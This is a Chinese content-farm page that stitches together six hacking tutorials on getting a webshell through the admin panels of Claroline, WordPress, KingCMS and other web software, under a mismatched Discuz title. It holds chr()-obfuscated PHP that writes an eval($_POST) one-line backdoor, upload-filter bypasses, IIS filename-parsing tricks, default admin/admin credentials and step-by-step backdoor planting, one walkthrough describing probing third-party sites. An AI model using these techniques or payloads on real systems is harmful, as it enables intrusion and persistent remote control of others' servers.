Discuz 7.07.2后台拿Shell网站安全

2024-05-13

Discuz 7.07.2后台拿Shell网站安全(通用6篇)

篇1:Discuz 7.07.2后台拿Shell网站安全

课廊1.8.9是课廊1.8.8的升级版本,

主要是增加了包括本站提供的中文等语言文件、

修复一些安全问题、补充论坛帖子的删除功能以及输出练习或下载作业时中断的问题等等,

这是官方的说法,但是后台的安全问题很是很严重,

首先www.hack50.com/claroline/claroline/install/  安装页面的漏洞,默认是没有删除的

进入后台之后编辑器可以上传文件 但是当上传php的时候 会自动变为phps

jsp等其他文件必须要加入图片的文件头才能上传  ,可能有些脚本马加入文件头后会出现错误,

但是本程序还有一个致命的漏洞就是在教学空间 的首页 创建一个课程 然后点击课程进入后

选择课程练习 这里可以随便上传文件 虽然 php文件上传后还会变为phps 但是其他文件不再

验证文件头!

还有一个漏洞就是学习路径 这个栏目 可以上传后缀为zip的压缩包 可以将jsp马 放进去然后加压为zip

格式的文件后上传 ,程序会自动解压

上传文件的路径是/courses/创建课件目录/document/

如/courses/EN/d ... 090819208186474.jsp

安全提示:

注意:现在仍然可以通过网络浏览你的课廊(Claroline)安装程序的目录(claroline/install/),

这表示任何人都有可能能够重新安装你的平台!我们强烈建议您将这个目录保护起来,或是将它从服务器中删除掉。

安全警示:我们建议在php.ini中将register_globals设置为off

作者:hualuowusheng ,情整理编辑

★ 60度? CMS 1.0后台COOKIE欺骗以及后台直接GETWEBSHELL漏洞预警

★ SDCms (时代网站信息管理系统) 1.2 1.3 后台拿WebShell及修复

★ linux备份Mysql数据库shell

★ 反恐精英溢出漏洞

★ 漏洞整改报告

★ 高中语文如何拿满分

★ 拿成绩单作文

★ 拿书记作文

★ 如何登录拼多多管理后台

★ v5Shop注入漏洞及修复

篇2:Discuz 7.07.2后台拿Shell网站安全

$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);

$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);

$a=chr(119);

$fp=@fopen($filen,$a);

$msg=@fwrite($fp,$filec);

if($msg) echo chr(79).chr(75).chr(33);

@fclose($fp);

?>

后台-订单管理-订单打印-选择源代码编辑-保存

返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功!

篇3:Discuz 7.07.2后台拿Shell网站安全

不是0day,只是之前用了一周的WP试着做博客来着,发现WP如果能进后台就可以直接拿SHELL的。

大牛说插入404文件,那个何必呢,动别人文件总归是不好,插挂了就悲剧了,

本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:

wp-contentthemeswawa1.php

篇4:Discuz 7.07.2后台拿Shell网站安全

能不能利用的NC提交,其实NC提交已经反锁了,利用opera浏览器或者使用suitbute更为简洁。那一般说来什么情况下可以如此使用呢,看源代码

出现类似filepath value=”upload”就爽歪歪了,试着修改value=“upload.asp;”

出现类似filename value =”1312321321″,试着修改value=”1312321321.asp”

如果还不行的可是在后面加上一个空格或者;试试

篇5:Discuz 7.07.2后台拿Shell网站安全

后台地址:admin

默认账号密码:admin admin

拿shell方法:

随便找个地方,上传一句话图片马,重命名为xx.asp

ps:后面小菜发现:这个程序貌似是改头换面的,

维博天下CMS后台拿shell漏洞预警

篇6:Discuz 7.07.2后台拿Shell网站安全

[博客地址]:www.337479.cn/

[文章作者]:草哲

又有小半年没写教程了,今天在家没事做在网上闲逛,看到了一个网站搞的还不错,本想渗透一下,网站是PHP的,没有什么结果,于是便用myipneighbors查了一下该服务器的网站,发现有很多,只能从其他网站下手了!

图1

网站首页连一个连接没有,开始以为就是一个纯HTML的网站,后来发现了一个连接确定该网站是ASP的程序,习惯性的在网址后面敲上admin,后台目录就出来了!

图2

是KingCMS 5.0的程序,在网上搜索了一大圈也没有找到5.0可以利用的地方,就有个3.0利用fckeditor拿shell的,具体我怎么进入的后台,在这里就不说了,毕竟本文介绍的是后台拿SHELL。因为网上没有KingCMS 5.0拿SHELL的方法,自己琢磨实践了一下,总结出一个拿SHELL的方法。

图3

下面介绍具体拿SHELL的方法!进入后台之后,点上图红圈圈处的“模块管理”,模块管理页面后在点击下图红圈圈处的“单页面”

图4

进入“单页面”界面,在点击“添加单页面”

图5

进入添加单页面,具体每个栏目如何填写请看下图,重要的是页面路径,一定要定义扩展名,

而最重要的是一定点一下编辑器上的“源代码”按钮,如红色圈圈所示,否则你写进去的代码可会直接输出到页面上而不是执行哦!页面内容那里我这里写的一句话木马,建议大家也是先弄一句话,之后在上传大马!页面下方其它的就不用去管了,直接点下面的“保存”按钮即可!

图6

图7

点“取消”后直接回到开始的“单页面”的管理页,在这里我们可以看到刚刚添加进去的页面!

图8

至于这页面的路径是什么?聪明的你会想到的,它会保存在网站的根目录下!

图9

看,成功了吧?我们用客户端来连接吧!

图10

本文来自 360文秘网(www.360wenmi.com),转载请保留网址和出处

【Discuz 7.07.2后台拿Shell网站安全】相关文章:

上一篇:技校的学生会第一学期的工作总结下一篇:建筑工程施工现场环境保护分析论文

本站热搜

    相关推荐